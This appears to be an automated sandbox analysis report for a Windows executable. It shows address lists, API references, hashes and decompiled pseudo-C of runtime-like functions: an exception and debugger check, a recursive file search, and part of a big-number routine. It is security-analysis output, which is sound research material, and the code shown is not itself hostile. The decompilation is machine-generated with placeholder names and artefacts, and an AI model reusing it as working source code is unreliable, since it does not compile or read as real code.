    0x0083294a
    0x00833063
    0x0083306b
    0x00833072
    0x00833079
    0x00833086
    0x00833098
    0x0083309d
    0x008330a3
    0x008330b5
    0x008330bb
    0x008330c8
    0x008330d5
    0x008330e2
    0x008330e8
    0x008330ea
    0x008330f7
    0x008330f9
    0x008330f9
    0x008330fa
    0x008330fa
    0x00833106
    0x00833116
    0x00833116
    0x00833119
    0x0083311f
    0x00833125
    0x00833127
    0x00833128
    0x0083312d
    0x00833135
    0x0083313b
    0x008331eb
    0x008331ee
    0x00000000
    0x008331ee
    0x00833141
    0x00833147
    0x0083314a
    0x00000000
    0x00000000
    0x00833150
    0x00833153
    0x00000000
    0x00000000
    0x00833159
    0x0083315c
    0x008331bd
    0x008331c4
    0x008331cb
    0x008331d0
    0x008331d4
    0x00000000
    0x00000000
    0x008331dd
    0x008331e2
    0x00000000
    0x008331e2
    0x0083315e
    0x00833165
    0x00000000
    0x00000000
    0x0083316b
    0x00833171
    0x00833174
    0x0083317b
    0x00833186
    0x00833186
    0x00833189
    0x0083318f
    0x00833192
    0x00833196
    0x00833198
    0x0083319f
    0x008331a3
    0x008331a6
    0x008331a6
    0x008331a6
    0x008331ae
    0x008331b2
    0x008331b7
    0x008331bb
    0x00000000
    0x00000000
    0x00000000
    0x008331bb
    0x008330ec
    0x008330ee
    0x008330f5
    0x00000000
    0x00000000
    0x00000000
    0x008330f5
    0x00832950
    0x00833039
    0x00833039
    0x00833043
    0x00833051
    0x00833057
    0x00833057
    0x00000000
    0x00833043
    0x00832956
    0x00832959
    0x008329ed
    0x008329f5
    0x00832a04
    0x00832a08
    0x00832a0b
    0x00832a12
    0x00832a1b
    0x00832a1d
    0x00832a21
    0x00832a27
    0x00832a2c
    0x00832a38
    0x00832a45
    0x00832a52
    0x00832a58
    0x00832a5b
    0x00832a68
    0x00832a68
    0x00832a68
    0x00832a6a
    0x00832a6c
    0x00832a6c
    0x00832a72
    0x00832a75
    0x00832a81
    0x00832a81
    0x00832a83
    0x00832a83
    0x00832a8e
    0x00832a90
    0x00832a95
    0x00832a9b
    0x00832aa1
    0x00832aaa
    0x00832aba
    0x00832aba
    0x00832aa3
    0x00832aa3
    0x00832aa5
    0x00832aa5
    0x00832abc
    0x00832ad2
    0x00832ad8
    0x00832ae6
    0x00832af1
    0x00832afc
    0x00832aff
    0x00832b11
    0x00832b1f
    0x00832b2a
    0x00832b3a
    0x00832b48
    0x00832b4b
    0x00832b50
    0x00832b53
    0x00832b56
    0x00832b59
    0x00832b5c
    0x00832b5e
    0x00832b60
    0x00832b62
    0x00832b62
    0x00832b60
    0x00832b6b
    0x00832b71
    0x00832b77
    0x00832bbc
    0x00832bbc
    0x00832bbf
    0x00832bc9
    0x00832bcb
    0x00832bdd
    0x00832bdd
    0x00832be7
    0x00832be7
    0x00832bed
    0x00832bef
    0x00832bf9
    0x00832bfe
    0x00832c00
    0x00832c02
    0x00832c0c
    0x00832c0c
    0x00832bfe
    0x00832c13
    0x00832c16
    0x00832c22
    0x00832c22
    0x00000000
    0x00832c18
    0x00832c18
    0x00832c1b
    0x00000000
    0x00000000
    0x00832c1f
    0x00832c24
    0x00832c24
    0x00832c30
    0x00832c30
    0x00832c32
    0x00832c38
    0x00832c66
    0x00832c6a
    0x00832c6c
    0x00832c6e
    0x00832c6e
    0x00832c6e
    0x00832c71
    0x00832c71
    0x00832c7c
    0x00832c82
    0x00832c89
    0x00832c8f
    0x00832c91
    0x00832c97
    0x00832c9e
    0x00832ca4
    0x00832cab
    0x00832cb1
    0x00832cb1
    0x00832cb7
    0x00832cba
    0x00832cbf
    0x00832cc2
    0x00832cc4
    0x00832cc6
    0x00832cc8
    0x00832cc8
    0x00832cd6
    0x00832cdb
    0x00832cdd
    0x00832ce1
    0x00832ce8
    0x00832d69
    0x00832d73
    0x00832d7e
    0x00832d81
    0x00832d88
    0x00832d8a
    0x00832d8a
    0x00832d8a
    0x00832d8d
    0x00832d8f
    0x00832e91
    0x00832d95
    0x00832d9e
    0x00832da1
    0x00832db0
    0x00832dba
    0x00832dbe
    0x00832dc5
    0x00832dc7
    0x00832dcd
    0x00832dd4
    0x00832ddd
    0x00832de3
    0x00832de4
    0x00832df0
    0x00832df4
    0x00832dfa
    0x00832dfc
    0x00832e04
    0x00832e0a
    0x00832e0c
    0x00832e16
    0x00832e18
    0x00832e23
    0x00832e2b
    0x00832e48
    0x00832e58
    0x00832e5e
    0x00832e61
    0x00832e6c
    0x00832e74
    0x00832e79
    0x00832e7c
    0x00832e7f
    0x00832e82
    0x00832e84
    0x00832e86
    0x00832e89
    0x00832e89
    0x00832e84
    0x00832dd4
    0x00832dc7
    0x00832e9a
    0x00832ea1
    0x00832ea3
    0x00832ea5
    0x00832ea5
    0x00832cea
    0x00832cea
    0x00832cec
    0x00832cef
    0x00832cf2
    0x00832cf9
    0x00832cfe
    0x00832d0a
    0x00832d0f
    0x00832d12
    0x00832d13
    0x00832d14
    0x00832d16
    0x00832d29
    0x00832d2e
    0x00832d33
    0x00832d33
    0x00832d38
    0x00832d38
    0x00832d38
    0x00832d3a
    0x00832d3d
    0x00832d3f
    0x00832d41
    0x00832d46
    0x00832d4d
    0x00832d4e
    0x00832d4e
    0x00832d56
    0x00832d56
    0x00832eac
    0x00832eb3
    0x00832ec1
    0x00832ec1
    0x00832ecf
    0x00832ed4
    0x00832edb
    0x00832fbf
    0x00832fe0
    0x00832fe9
    0x00832ff5
    0x00832ffb
    0x00833003
    0x00833005
    0x00833012
    0x00833019
    0x0083301e
    0x00833022
    0x0083302f
    0x0083302f
    0x00833022
    0x00000000
    0x00832ee1
    0x00832ee4
    0x00832ef2
    0x00832efb
    0x00832f04
    0x00832f07
    0x00832f09
    0x00832f0b
    0x00832f0e
    0x00832f10
    0x00832f13
    0x00832f16
    0x00832f18
    0x00832f20
    0x00832f22
    0x00832f25
    0x00000000
    0x00000000
    0x00832f2b
    0x00832f30
    0x00000000
    0x00000000
    0x00832f32
    0x00832f34
    0x00832f43
    0x00832f43
    0x00832f50
    0x00832f55
    0x00832f58
    0x00832f5a
    0x00832f5a
    0x00832f5a
    0x00832f5a
    0x00832f5d
    0x00832f5f
    0x00832f62
    0x00832f62
    0x00832f65
    0x00832f96
    0x00832f96
    0x00832f96
    0x00832f9d
    0x00832fa4
    0x00832fa9
    0x00832f67
    0x00832f69
    0x00832f6c
    0x00832f6c
    0x00832f6f
    0x00832f72
    0x00832f74
    0x00832f81
    0x00832f83
    0x00832f89
    0x00832f8b
    0x00832f8e
    0x00832f8e
    0x00832f8e
    0x00832f93
    0x00000000
    0x00832f93
    0x00832fac
    0x00832fac
    0x00832fad
    0x00832fb0
    0x00832fb0
    0x00832fb9
    0x00832fbc
    0x00000000
    0x00832fbc
    0x00832edb
    0x00832c45
    0x00832c47
    0x00832c4c
    0x00832c50
    0x00832c52
    0x00832c60
    0x00832c62
    0x00000000
    0x00832c62
    0x00832c54
    0x00832c57
    0x00000000
    0x00000000
    0x00832c5b
    0x00000000
    0x00832c5c
    0x00832c16
    0x00832bcd
    0x00832bcf
    0x00000000
    0x00000000
    0x00832bd1
    0x00832bd3
    0x00832bd5
    0x00832bd5
    0x00000000
    0x00832b79
    0x00832b79
    0x00832b79
    0x00832b7c
    0x00832bb2
    0x00000000
    0x00832bb2
    0x00832b7f
    0x00832b7f
    0x00832b82
    0x00832ba6
    0x00000000
    0x00832ba6
    0x00832b84
    0x00832b84
    0x00832b87
    0x00832b9a
    0x00832b9a
    0x00000000
    0x00832b9a
    0x00832b89
    0x00832b8c
    0x00000000
    0x00000000
    0x00832b8e
    0x00000000
    0x00832b8e
    0x00832b77
    0x00832a77
    0x00832a7a
    0x00000000
    0x00000000
    0x00832a7e
    0x00000000
    0x00832a7e
    0x00832a5d
    0x00832a60
    0x00000000
    0x00832a62
    0x00832a62
    0x00832a64
    0x00000000
    0x00832a64
    0x00832a60
    0x0083295f
    0x00832962
    0x00000000
    0x00832968
    0x00832974
    0x0083297c
    0x00832984
    0x00832993
    0x0083299b
    0x0083299e
    0x008329a4
    0x008329aa
    0x008329b0
    0x008329b2
    0x008329bc
    0x008329bc
    0x008329c2
    0x008329c9
    0x008329d7
    0x008329da
    0x008329e0
    0x008329e0
    0x00000000
    0x008329c9
    0x00832962
    0x008328ff
    0x00832906
    0x00000000
    0x00000000
    0x00000000
    0x00832906
    0x008328f6
    0x008328f6
    0x00000000
    0x00832897
    0x00832899
    0x008331f1
    0x008331f4
    0x00833202
    0x0083320d
    0x0083320d
    0x00832895
    0x00832831
    0x00832833
    0x00000000
    0x00832833
    0x008327c1
    0x008327c3
    0x008327c5
    0x008327cb
    0x00000000
    0x008327d7
    0x008327d9
    0x008327dd
    0x008327e7
    0x008327e9
    0x008327f2
    0x00000000
    0x008327f4
    0x00832804
    0x00832815
    0x0083281a
    0x00000000
    0x0083281a
    0x008327f2

    APIs
    • __EH_prolog.LIBCMT ref: 00832786
    • _strlen.LIBCMT ref: 00832D0A
      • Part of subcall function 00841006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0083B3AF,00000000,?,?,?,0004022A), ref: 00841022
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00832E61
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1706572503-2756464174
    • Opcode ID: 66705fc3d32186154f100b299fdfc4b298dceade0e1709acab23929875172b70
    • Instruction ID: a7287bb2d16f199574c05accbc091d25366412c0fd33ec49aa4378455361e78d
    • Opcode Fuzzy Hash: 66705fc3d32186154f100b299fdfc4b298dceade0e1709acab23929875172b70
    • Instruction Fuzzy Hash: 3C62E0719002448FDF28DF68C885AEA3BE1FF94304F04457EED9ADB286DB749945CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00857C57(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v0;
    				signed int _v8;
    				intOrPtr _v524;
    				intOrPtr _v528;
    				void* _v532;
    				intOrPtr _v536;
    				char _v540;
    				intOrPtr _v544;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				intOrPtr _v556;
    				intOrPtr _v560;
    				intOrPtr _v564;
    				intOrPtr _v568;
    				intOrPtr _v572;
    				intOrPtr _v576;
    				intOrPtr _v580;
    				intOrPtr _v584;
    				char _v724;
    				intOrPtr _v792;
    				intOrPtr _v800;
    				char _v804;
    				intOrPtr _v808;
    				char _v812;
    				signed int _t40;
    				char* _t47;
    				intOrPtr _t49;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				intOrPtr _t66;
    				intOrPtr _t67;
    				int _t68;
    				intOrPtr _t69;
    				signed int _t70;
    
    				_t69 = __esi;
    				_t67 = __edi;
    				_t66 = __edx;
    				_t61 = __ebx;
    				_t40 =  *0x86d668; // 0x14325215
    				_t41 = _t40 ^ _t70;
    				_v8 = _t40 ^ _t70;
    				if(_a4 != 0xffffffff) {
    					_push(_a4);
    					E0084E690(_t41);
    					_pop(_t62);
    				}
    				E0084E920(_t67,  &_v804, 0, 0x50);
    				E0084E920(_t67,  &_v724, 0, 0x2cc);
    				_v812 =  &_v804;
    				_t47 =  &_v724;
    				_v808 = _t47;
    				_v548 = _t47;
    				_v552 = _t62;
    				_v556 = _t66;
    				_v560 = _t61;
    				_v564 = _t69;
    				_v568 = _t67;
    				_v524 = ss;
    				_v536 = cs;
    				_v572 = ds;
    				_v576 = es;
    				_v580 = fs;
    				_v584 = gs;
    				asm("pushfd");
    				_pop( *_t22);
    				_v540 = _v0;
    				_t25 =  &_v0; // 0x1b
    				_t49 = _t25;
    				_v528 = _t49;
    				_v724 = 0x10001;
    				_v544 =  *((intOrPtr*)(_t49 - 4));
    				_v804 = _a8;
    				_v800 = _a12;
    				_v792 = _v0;
    				_t68 = IsDebuggerPresent();
    				SetUnhandledExceptionFilter(0);
    				_t36 =  &_v812; // -785
    				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
    					_push(_a4);
    					E0084E690(_t57);
    				}
    				return E0084E243(_v8 ^ _t70);
    			}





































    0x00857c57
    0x00857c57
    0x00857c57
    0x00857c57
    0x00857c62
    0x00857c67
    0x00857c69
    0x00857c71
    0x00857c73
    0x00857c76
    0x00857c7b
    0x00857c7b
    0x00857c87
    0x00857c9a
    0x00857ca8
    0x00857cae
    0x00857cb4
    0x00857cba
    0x00857cc0
    0x00857cc6
    0x00857ccc
    0x00857cd2
    0x00857cd8
    0x00857cde
    0x00857ce5
    0x00857cec
    0x00857cf3
    0x00857cfa
    0x00857d01
    0x00857d08
    0x00857d09
    0x00857d12
    0x00857d18
    0x00857d18
    0x00857d1b
    0x00857d21
    0x00857d2e
    0x00857d37
    0x00857d40
    0x00857d49
    0x00857d57
    0x00857d59
    0x00857d5f
    0x00857d6e
    0x00857d7a
    0x00857d7d
    0x00857d82
    0x00857d91

    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00857D4F
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00857D59
    • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00857D66
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: fb982f71ce1687862aad4f2aa463aba83fa41cb608bb80d7673a8bc27c976b1b
    • Instruction ID: 2fa2e647c618053ecc28e5ac2d162cd8b540406cdb71866ae4702e200427e306
    • Opcode Fuzzy Hash: fb982f71ce1687862aad4f2aa463aba83fa41cb608bb80d7673a8bc27c976b1b
    • Instruction Fuzzy Hash: 3631B27490122CABCB61DF68D98979DBBB8FF18311F5045EAE80CA7290E7709B858F45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0085A02E(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				signed int _v12;
    				intOrPtr* _v32;
    				CHAR* _v36;
    				signed int _v48;
    				char _v286;
    				signed int _v287;
    				struct _WIN32_FIND_DATAA _v332;
    				intOrPtr* _v336;
    				signed int _v340;
    				signed int _v344;
    				intOrPtr _v372;
    				signed int _t35;
    				signed int _t40;
    				signed int _t43;
    				intOrPtr _t45;
    				signed char _t47;
    				intOrPtr* _t55;
    				union _FINDEX_INFO_LEVELS _t57;
    				signed int _t62;
    				signed int _t65;
    				void* _t72;
    				void* _t74;
    				signed int _t75;
    				void* _t78;
    				CHAR* _t79;
    				intOrPtr* _t83;
    				intOrPtr _t85;
    				void* _t87;
    				intOrPtr* _t88;
    				signed int _t92;
    				signed int _t96;
    				void* _t101;
    				intOrPtr _t102;
    				signed int _t105;
    				union _FINDEX_INFO_LEVELS _t106;
    				void* _t111;
    				intOrPtr _t112;
    				void* _t113;
    				signed int _t118;
    				void* _t119;
    				signed int _t120;
    				void* _t121;
    				void* _t122;
    
    				_push(__ecx);
    				_t83 = _a4;
    				_t2 = _t83 + 1; // 0x1
    				_t101 = _t2;
    				do {
    					_t35 =  *_t83;
    					_t83 = _t83 + 1;
    				} while (_t35 != 0);
    				_push(__edi);
    				_t105 = _a12;
    				_t85 = _t83 - _t101 + 1;
    				_v8 = _t85;
    				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
    					_push(__ebx);
    					_push(__esi);
    					_t5 = _t105 + 1; // 0x1
    					_t78 = _t5 + _t85;
    					_t111 = E00857B91(_t85, _t78, 1);
    					_pop(_t87);
    					__eflags = _t105;
    					if(_t105 == 0) {
    						L6:
    						_push(_v8);
    						_t78 = _t78 - _t105;
    						_t40 = E0085DDC1(_t87, _t111 + _t105, _t78, _a4);
    						_t120 = _t119 + 0x10;
    						__eflags = _t40;
    						if(__eflags != 0) {
    							goto L9;
    						} else {
    							_t72 = E0085A26D(_a16, _t101, __eflags, _t111);
    							E00857AC6(0);
    							_t74 = _t72;
    							goto L8;
    						}
    					} else {
    						_push(_t105);
    						_t75 = E0085DDC1(_t87, _t111, _t78, _a8);
    						_t120 = _t119 + 0x10;
    						__eflags = _t75;
    						if(_t75 != 0) {
    							L9:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E00857E31();
    							asm("int3");
    							_t118 = _t120;
    							_t121 = _t120 - 0x150;
    							_t43 =  *0x86d668; // 0x14325215
    							_v48 = _t43 ^ _t118;
    							_t88 = _v32;
    							_push(_t78);
    							_t79 = _v36;
    							_push(_t111);
    							_t112 = _v332.cAlternateFileName;
    							_push(_t105);
    							_v372 = _t112;
    							while(1) {
    								__eflags = _t88 - _t79;
    								if(_t88 == _t79) {
    									break;
    								}
    								_t45 =  *_t88;
    								__eflags = _t45 - 0x2f;
    								if(_t45 != 0x2f) {
    									__eflags = _t45 - 0x5c;
    									if(_t45 != 0x5c) {
    										__eflags = _t45 - 0x3a;
    										if(_t45 != 0x3a) {
    											_t88 = E0085DE10(_t79, _t88);
    											continue;
    										}
    									}
    								}
    								break;
    							}
    							_t102 =  *_t88;
    							__eflags = _t102 - 0x3a;
    							if(_t102 != 0x3a) {
    								L19:
    								_t106 = 0;
    								__eflags = _t102 - 0x2f;
    								if(_t102 == 0x2f) {
    									L23:
    									_t47 = 1;
    									__eflags = 1;
    								} else {
    									__eflags = _t102 - 0x5c;
    									if(_t102 == 0x5c) {
    										goto L23;
    									} else {
    										__eflags = _t102 - 0x3a;
    										if(_t102 == 0x3a) {
    											goto L23;
    										} else {
    											_t47 = 0;
    										}
    									}
    								}
    								_t90 = _t88 - _t79 + 1;
    								asm("sbb eax, eax");
    								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
    								E0084E920(_t106,  &_v332, _t106, 0x140);
    								_t122 = _t121 + 0xc;
    								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
    								_t55 = _v336;
    								__eflags = _t113 - 0xffffffff;
    								if(_t113 != 0xffffffff) {
    									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
    									__eflags = _t92;
    									_t93 = _t92 >> 2;
    									_v344 = _t92 >> 2;
    									do {
    										__eflags = _v332.cFileName - 0x2e;
    										if(_v332.cFileName != 0x2e) {
    											L36:
    											_push(_t55);
    											_t57 = E0085A02E(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
    											_t122 = _t122 + 0x10;
    											__eflags = _t57;
    											if(_t57 != 0) {
    												goto L26;
    											} else {
    												goto L37;
    											}
    										} else {
    											_t93 = _v287;
    											__eflags = _t93;
    											if(_t93 == 0) {
    												goto L37;
    											} else {
    												__eflags = _t93 - 0x2e;
    												if(_t93 != 0x2e) {
    													goto L36;
    												} else {
    													__eflags = _v286;
    													if(_v286 == 0) {
    														goto L37;
    													} else {
    														goto L36;
    													}
    												}
    											}
    										}
    										goto L40;
    										L37:
    										_t62 = FindNextFileA(_t113,  &_v332);
    										__eflags = _t62;
    										_t55 = _v336;
    									} while (_t62 != 0);
    									_t103 =  *_t55;
    									_t96 = _v344;
    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
    									__eflags = _t96 - _t65;
    									if(_t96 != _t65) {
    										E00855070(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00859E86);
    									}
    								} else {
    									_push(_t55);
    									_t57 = E0085A02E(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
    									L26:
    									_t106 = _t57;
    								}
    								__eflags = _t113 - 0xffffffff;
    								if(_t113 != 0xffffffff) {
    									FindClose(_t113);
    								}
    							} else {
    								__eflags = _t88 -  &(_t79[1]);
    								if(_t88 ==  &(_t79[1])) {
    									goto L19;
    								} else {
    									_push(_t112);
    									E0085A02E(_t79, _t88, 0, _t112, _t79, 0, 0);
    								}
    							}
    							__eflags = _v12 ^ _t118;
    							return E0084E243(_v12 ^ _t118);
    						} else {
    							goto L6;
    						}
    					}
    				} else {
    					_t74 = 0xc;
    					L8:
    					return _t74;
    				}
    				L40:
    			}















































    0x0085a033
    0x0085a034
    0x0085a037
    0x0085a037
    0x0085a03a
    0x0085a03a
    0x0085a03c
    0x0085a03d
    0x0085a046
    0x0085a047
    0x0085a04a
    0x0085a04d
    0x0085a052
    0x0085a059
    0x0085a05a
    0x0085a05b
    0x0085a05e
    0x0085a068
    0x0085a06b
    0x0085a06c
    0x0085a06e
    0x0085a082
    0x0085a082
    0x0085a085
    0x0085a08f
    0x0085a094
    0x0085a097
    0x0085a099
    0x00000000
    0x0085a09b
    0x0085a09f
    0x0085a0a8
    0x0085a0ae
    0x00000000
    0x0085a0b1
    0x0085a070
    0x0085a070
    0x0085a076
    0x0085a07b
    0x0085a07e
    0x0085a080
    0x0085a0b7
    0x0085a0b9
    0x0085a0ba
    0x0085a0bb
    0x0085a0bc
    0x0085a0bd
    0x0085a0be
    0x0085a0c3
    0x0085a0c7
    0x0085a0c9
    0x0085a0cf
    0x0085a0d6
    0x0085a0d9
    0x0085a0dc
    0x0085a0dd
    0x0085a0e0
    0x0085a0e1
    0x0085a0e4
    0x0085a0e5
    0x0085a106
    0x0085a106
    0x0085a108
    0x00000000
    0x00000000
    0x0085a0ed
    0x0085a0ef
    0x0085a0f1
    0x0085a0f3
    0x0085a0f5
    0x0085a0f7
    0x0085a0f9
    0x0085a104
    0x00000000
    0x0085a104
    0x0085a0f9
    0x0085a0f5
    0x00000000
    0x0085a0f1
    0x0085a10a
    0x0085a10c
    0x0085a10f
    0x0085a128
    0x0085a128
    0x0085a12a
    0x0085a12d
    0x0085a13d
    0x0085a13f
    0x0085a13f
    0x0085a12f
    0x0085a12f
    0x0085a132
    0x00000000
    0x0085a134
    0x0085a134
    0x0085a137
    0x00000000
    0x0085a139
    0x0085a139
    0x0085a139
    0x0085a137
    0x0085a132
    0x0085a145
    0x0085a14d
    0x0085a151
    0x0085a15f
    0x0085a164
    0x0085a179
    0x0085a17b
    0x0085a181
    0x0085a184
    0x0085a1b6
    0x0085a1b6
    0x0085a1b8
    0x0085a1bb
    0x0085a1c1
    0x0085a1c1
    0x0085a1c8
    0x0085a1e2
    0x0085a1e2
    0x0085a1f1
    0x0085a1f6
    0x0085a1f9
    0x0085a1fb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0085a1ca
    0x0085a1ca
    0x0085a1d0
    0x0085a1d2
    0x00000000
    0x0085a1d4
    0x0085a1d4
    0x0085a1d7
    0x00000000
    0x0085a1d9
    0x0085a1d9
    0x0085a1e0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0085a1e0
    0x0085a1d7
    0x0085a1d2
    0x00000000
    0x0085a1fd
    0x0085a205
    0x0085a20b
    0x0085a20d
    0x0085a20d
    0x0085a215
    0x0085a21a
    0x0085a222
    0x0085a225
    0x0085a227
    0x0085a23b
    0x0085a240
    0x0085a186
    0x0085a186
    0x0085a18a
    0x0085a192
    0x0085a192
    0x0085a192
    0x0085a194
    0x0085a197
    0x0085a19a
    0x0085a19a
    0x0085a111
    0x0085a114
    0x0085a116
    0x00000000
    0x0085a118
    0x0085a118
    0x0085a11e
    0x0085a123
    0x0085a116
    0x0085a1a7
    0x0085a1b2
    0x00000000
    0x00000000
    0x00000000
    0x0085a080
    0x0085a054
    0x0085a056
    0x0085a0b2
    0x0085a0b6
    0x0085a0b6
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: cba0c3a5e02236aff63a754092534667df5a7aa0f121f6e10b7f6ed8f0a4c462
    • Instruction ID: 90e2383bb6906c3ca739f258099209536438a89532dd8dcfde7975ed455b2668
    • Opcode Fuzzy Hash: cba0c3a5e02236aff63a754092534667df5a7aa0f121f6e10b7f6ed8f0a4c462
    • Instruction Fuzzy Hash: A0310571900609AFCB288E78CCC4EFA7BBDFB85315F104298FC19C7291E6719E488B61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0085C100(signed int* _a4, signed int* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v52;
    				signed int _v56;
    				signed int _v60;
    				signed int _v64;
    				signed int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed int* _v80;
    				char _v540;
    				signed int _v544;
    				signed int _t197;
    				signed int _t198;
    				signed int* _t200;
    				signed int _t201;
    				signed int _t204;
    				signed int _t206;
    				signed int _t208;
    				signed int _t209;
    				signed int _t213;
    				signed int _t219;
    				intOrPtr _t225;
    				void* _t228;
    				signed int _t230;
    				signed int _t247;
    				signed int _t250;
    				void* _t253;
    				signed int _t256;
    				signed int* _t262;
    				signed int _t263;
    				signed int _t264;
    				void* _t265;
    				intOrPtr* _t266;
    				signed int _t267;
    				signed int _t269;
    				signed int _t270;
    				signed int _t271;
    				signed int _t272;
    				signed int* _t274;
    				signed int* _t278;
    				signed int _t279;
    				signed int _t280;
    				intOrPtr _t282;
    				void* _t286;
    				signed char _t292;
    				signed int _t295;
    				signed int _t303;
    				signed int _t306;
    				signed int _t307;
    				signed int _t309;
    				signed int _t311;
    				signed int _t313;
    				intOrPtr* _t314;
    				signed int _t318;
    				signed int _t322;
    				signed int* _t328;
    				signed int _t330;
    				signed int _t331;
    				signed int _t333;
    				void* _t334;
    				signed int _t336;
    				signed int _t338;
    				signed int _t341;
    				signed int _t342;
    				signed int* _t344;
    				signed int _t349;
    				signed int _t351;
    				void* _t355;
    				signed int _t359;
    				signed int _t360;
    				signed int _t362;
    				signed int* _t368;
    				signed int* _t369;
    				signed int* _t370;
    				signed int* _t373;
    
    				_t262 = _a4;
    				_t197 =  *_t262;
    				if(_t197 != 0) {
    					_t328 = _a8;
    					_t267 =  *_t328;
    					__eflags = _t267;
    					if(_t267 != 0) {
    						_t3 = _t197 - 1; // -1
    						_t349 = _t3;
    						_t4 = _t267 - 1; // -1
    						_t198 = _t4;
    						_v16 = _t349;
    						__eflags = _t198;
    						if(_t198 != 0) {
    							__eflags = _t198 - _t349;
    							if(_t198 > _t349) {
    								L23:
    								__eflags = 0;
    								return 0;
    							} else {
    								_t46 = _t198 + 1; // 0x0
    								_t306 = _t349 - _t198;
    								_v60 = _t46;
    								_t269 = _t349;
    								__eflags = _t349 - _t306;
    								if(_t349 < _t306) {
    									L21:
    									_t306 = _t306 + 1;
    									__eflags = _t306;
    								} else {
    									_t368 =  &(_t262[_t349 + 1]);
    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
    									__eflags = _t341;
    									while(1) {
    										__eflags =  *_t341 -  *_t368;
    										if( *_t341 !=  *_t368) {
    											break;
    										}
    										_t269 = _t269 - 1;
    										_t341 = _t341 - 4;
    										_t368 = _t368 - 4;
    										__eflags = _t269 - _t306;
    										if(_t269 >= _t306) {
    											continue;
    										} else {
    											goto L21;
    										}
    										goto L22;
    									}
    									_t369 = _a8;
    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
    										goto L21;
    									}
    								}
    								L22:
    								__eflags = _t306;
    								if(__eflags != 0) {
    									_t330 = _v60;
    									_t200 = _a8;
    									_t351 =  *(_t200 + _t330 * 4);
    									_t64 = _t330 * 4; // 0xffffe9e5
    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
    									_v36 = _t201;
